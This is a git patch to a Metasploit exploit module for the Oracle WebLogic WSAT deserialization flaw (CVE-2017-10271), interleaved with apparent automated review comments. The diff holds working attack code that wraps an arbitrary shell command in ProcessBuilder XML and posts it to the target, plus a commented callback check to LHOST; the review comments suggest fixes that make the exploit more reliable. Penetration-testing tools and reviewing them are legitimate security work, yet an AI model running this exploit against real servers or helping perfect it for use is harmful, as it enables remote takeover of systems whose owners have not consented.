From 867b32415d1c73b8addae162f5194a1345069c03 Mon Sep 17 00:00:00 2001 From: Kevin Kirsche Date: Sat, 6 Jan 2018 08:12:43 -0500 Subject: [PATCH] Fix feedback from wvu-r7 Fixes feedback from wvu-r7 - Consolidates payload to single method - Replaces gsub! with standard encode method - Note exploit discovery and proof of concept code used in authors (still seems weird to include the discovery as an author...) - Change link - Use `ARCH_CMD` instead of `[ARCH_CMD]` - Remove Linux target as it's only Windows or Unix - Remove timeout as I don't know how to pass it to `send_request_cgi` --- ...racle_weblogic_wsat_deserialization_rce.rb | 93 +++++++------------ 1 file changed, 33 insertions(+), 60 deletions(-) diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb index 42218f8533..4b3a580558 100644 --- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb +++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb 
@@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q( The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are - 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. + 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin + of ERPScan and Federico Dotta of Media Service. ), 'License' => MSF_LICENSE, - 'Author' => ['d3c3pt10n '], + 'Author' => [ + 'Kevin Kirsche ', # Metasploit module + 'Luffin', # Proof of Concept + 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery + ], 'References' => [ - [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'], + [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], + [ 'POC', 'https://github.com/Luffin/CVE-2017-10271'], + [ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'], [ 'CVE', '2017-10271'] ], 'Platform' => %w{ win linux unix }, @@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], - [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ], - [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ] + [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ], ], - 'Payload' => - { - 'DisableNops' => true - }, 'DisclosureDate' => "Oct 19 2017", # Note that this is by index, rather than name. It's generally easiest # just to put the default at the beginning of the list and skip this 
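Review bot: The context line `'Platform' => %w{ win linux unix },` that closes this hunk still advertises linux even though the Linux target is dropped in the following hunk, so the module claims a platform that no target can select; it should become `'Platform' => %w{ win unix },`. The new `'POC'` and `'Standalone Exploit'` entries in 'References' use identifiers that, as far as I know, are not among the reference types the framework recognises (URL, CVE, BID, EDB and similar), so msftidy is likely to flag them and the links may not be rendered; keeping both as `[ 'URL', ... ]` entries is the safe form. The info hash continues outside this hunk.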
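Review bot: The retained Unix target line still uses a bare constant as the hash key, `Platform => 'unix'`, while the Windows target on the line above uses the quoted `'Platform' => 'win'`; the bare form resolves to a constant rather than the string key the target definition reads, so the Unix target most likely carries no platform at all. The line should read `[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],`. This matters more after this commit because the target platform is what cmd_base and cmd_opt branch on in the next hunk; a target without a platform presumably falls back to the module-level list, which would make the branch unreliable. The Targets array closes inside the hunk, but the rest of the info hash lies outside it.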
@@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), - OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]), OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), ]) end - def cmd_payload - # Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need - # This escaping makes sure that our payload works! - replacements = [ ['&', '&'], ['"', '"'], ["'", '''], ['<', '<'], ['>', '>'] ] - xml_prepared = payload.encoded - replacements.each do |r| - xml_prepared.gsub!(r[0], r[1]) + def cmd_base + if target_platform == 'win' + return 'cmd' + else + return '/bin/sh' end - - return xml_prepared end - def unix_payload + def cmd_opt + if target_platform == 'win' + return '/c' + else + return '-c' + end + end + + def process_builder_payload # Generate a payload which will execute on a *nix machine using /bin/sh xml = %Q{ @@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote - /bin/sh + #{cmd_base} - -c + #{cmd_opt} - #{cmd_payload} - - - - - - - - -} - end - - # Generate a payload which will execute on a Windows machine using cmd - def windows_payload - xml = %Q{ - - - - - - - cmd - - - /c - - - #{cmd_payload} + #{payload.encoded.encode(xml: :text)} @@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote end # Not sure how to catch the response, so I'll leave this here in case someone can help -# def check_payload +# This payload is used by sending to the RHOST and then you will receive an HTTP request +# back from the target. If you got a request, it's vulnerable. If you didn't, it's not. +# def http_check_payload # xml = %Q{ # # # # -# http://{lhost}:{lport}/{random_uri} +# http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri} # # # 
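Review bot: cmd_base and cmd_opt decide on `target_platform == 'win'`, but in the framework's exploit mixin target_platform returns a PlatformList object rather than a string; if that holds here the comparison is never true and both targets are built with `/bin/sh -c`. Comparing the raw target hash value, `target['Platform'] == 'win'`, avoids the object/string mismatch. Both helpers also spell the same check as an if/else with explicit returns; the idiomatic one-liners are `target['Platform'] == 'win' ? 'cmd' : '/bin/sh'` and `target['Platform'] == 'win' ? '/c' : '-c'`. The comment above process_builder_payload, "Generate a payload which will execute on a *nix machine using /bin/sh", is stale now that the method serves both targets and should say something like `# Build the WSAT ProcessBuilder XML for the selected target's shell (cmd /c or /bin/sh -c)`. process_builder_payload's body continues into the next hunk.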
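Review bot: `payload.encoded.encode(xml: :text)` escapes only `&`, `<` and `>` and leaves quotes literal, whereas the gsub! table it replaces also rewrote `"` and `'`; that narrower escaping is correct for an element text node, which is what this interpolation fills, but it would not be safe for an attribute value, and the difference deserves a comment on the interpolation line: `# xml: :text escapes &, <, > only — sufficient for element text, not for attribute values`. The `#{cmd_base}` and `#{cmd_opt}` interpolations a few lines earlier are inserted unescaped, which is fine only as long as they remain the fixed strings the helpers return. The closing lines of the %Q string and of process_builder_payload are not preserved in this view of the hunk.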
@@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote # followed by the fake return address and then the payload. # def exploit - target_os = datastore['TARGET'].to_i - - xml_payload = '' - if target_os == 0 - xml_payload = windows_payload - else - xml_payload = unix_payload - end + xml_payload = process_builder_payload send_request_cgi( 'method' => 'POST',
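Review bot: The send_request_cgi call whose options begin on the hunk's last line accepts an optional timeout as its second positional argument in the framework's HttpClient mixin, so the TIMEOUT option removed in an earlier hunk did not have to go; the call could be written `send_request_cgi({ 'method' => 'POST', ... }, datastore['TIMEOUT'])` with the option restored. The `xml_payload` local is now assigned once and used once and could be passed inline, though keeping the name is a readability choice. The remaining arguments of the call and the rest of exploit, including whatever is done with the response, lie outside this hunk.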